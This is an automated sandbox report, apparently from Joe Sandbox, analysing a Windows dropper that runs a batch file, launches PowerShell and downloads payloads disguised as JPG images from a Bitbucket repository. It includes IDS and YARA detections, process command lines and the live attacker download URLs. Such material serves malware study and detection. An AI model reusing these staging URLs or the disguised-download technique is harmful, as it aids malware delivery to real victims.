        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49705 -> 185.166.143.49:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1Host: bitbucket.org
        Source: global trafficDNS traffic detected: DNS query: bitbucket.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 17:04:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 15020Server: AtlassianEdgeVary: authorization, cookie, user-context, Accept-Language, Origin, Accept-EncodingX-Used-Mesh: FalseContent-Language: enX-View-Name: bitbucket.apps.downloads.views.download_fileEtag: "87058da896b55747ba4e6e46ed4a200d"X-Dc-Location: Micros-3X-Served-By: 52563790643dX-Version: 3ff600212c86X-Static-Version: 3ff600212c86X-Request-Count: 3879X-Render-Time: 0.10709047317504883X-B3-Traceid: f9323d398cc148a7b6a0238c8cc639adX-B3-Spanid: 1a15bdc36336d4d5X-Frame-Options: SAMEORIGINContent-Security-Policy: object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-5klEsQ+/lmMPaGnHlTQm6A=='; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; fr
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 17:04:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 15023Server: AtlassianEdgeVary: authorization, cookie, user-context, Accept-Language, Origin, Accept-EncodingX-Used-Mesh: FalseContent-Language: enX-View-Name: bitbucket.apps.downloads.views.download_fileEtag: "d262e8bacb3f21ca001bdceb1cfc66a0"X-Dc-Location: Micros-3X-Served-By: c1d37df8df76X-Version: 3ff600212c86X-Static-Version: 3ff600212c86X-Request-Count: 461X-Render-Time: 0.09731030464172363X-B3-Traceid: 8ba6f34777ac4d28bfc0b737ee6a4d2fX-B3-Spanid: 9c57bf6c5c877b71X-Frame-Options: SAMEORIGINContent-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-y+F3Ri7t30+2yS3vrtRQPg=='; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
        Source: powershell.exe, 00000004.00000002.1553033093.0000023208545000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
        Source: powershell.exe, 00000005.00000002.1541729825.000001EED5DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000004.00000002.1558255319.000002320A2EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admin.atlassian.com
        Source: powershell.exe, 00000004.00000002.1558255319.000002320A2A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000004.00000002.1558255319.000002320A2BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.bitbucket.org
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ad
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ap
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ve
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpack
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/default_
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/logos/bi
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/jsi18n/en/dj
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC72E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/blog/announcing-our-new-ci-cd-runtime-with-up-to-8x-faster-builds
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/blog/wp-json/wp/v2/posts?categories=196&context=embed&per_page=6&orderby=date&
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gateway/api/emoji/
        Source: powershell.exe, 00000004.00000002.1558255319.000002320A7F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1568391237.0000023222708000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521063339.000001EEC3EE5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520809316.000001EEC3E14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521127326.000001EEC3F10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1545100978.000001EEDDE70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520786541.000001EEC3DC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521127326.000001EEC3F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520748169.000001EEC3DA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723
        Source: powershell.exe, 00000004.00000002.1558255319.000002320A7F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1568391237.0000023222708000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521063339.000001EEC3EE5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520809316.000001EEC3E14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521127326.000001EEC3F10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1545100978.000001EEDDE70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520786541.000001EEC3DC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521127326.000001EEC3F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520748169.000001EEC3DA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.status.atlassian.com/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bqlf8qjztdtr.statuspage.io
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
        Source: powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC6843000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000005.00000002.1545100978.000001EEDDEC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fhgdfhdfgd%2Ft
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/logout
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/manage-profile/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/profile/rest/profile&quot;
        Source: powershell.exe, 00000005.00000002.1541729825.000001EED5DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://preferences.atlassian.com
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.8:49704 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C22D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF681C22D70
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C21BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF681C21BF4
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C21D100_2_00007FF681C21D10
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C26F140_2_00007FF681C26F14
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C268F00_2_00007FF681C268F0
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C22EDC0_2_00007FF681C22EDC
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C25F800_2_00007FF681C25F80
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C241B40_2_00007FF681C241B4
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C21BF40_2_00007FF681C21BF4
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C25F7E0_2_00007FF681C25F7E
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C2366E0_2_00007FF681C2366E
        Source: 0XVZC3kfwL.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 3558 bytes, 1 file, at 0x2c +A "gam.bat", ID 666, number 1, 1 datablock, 0x1503 compression
        Source: 0XVZC3kfwL.exeBinary or memory string: OriginalFilename vs 0XVZC3kfwL.exe
        Source: 0XVZC3kfwL.exe, 00000000.00000000.1455637940.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 0XVZC3kfwL.exe
        Source: 0XVZC3kfwL.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 0XVZC3kfwL.exe
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4423
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4423Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.spre.evad.winEXE@9/6@1/1
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C26F14 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF681C26F14
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C21BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF681C21BF4
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C26F14 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF681C26F14
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C22EDC memset,memset,CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17,0_2_00007FF681C22EDC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeProcess created: C:\Windows\System32\cmd.exe cmd /c gam.bat
        Source: 0XVZC3kfwL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
        Source: 0XVZC3kfwL.exeReversingLabs: Detection: 42%
        Source: unknownProcess created: C:\Users\user\Desktop\0XVZC3kfwL.exe "C:\Users\user\Desktop\0XVZC3kfwL.exe"
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeProcess created: C:\Windows\System32\cmd.exe cmd /c gam.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
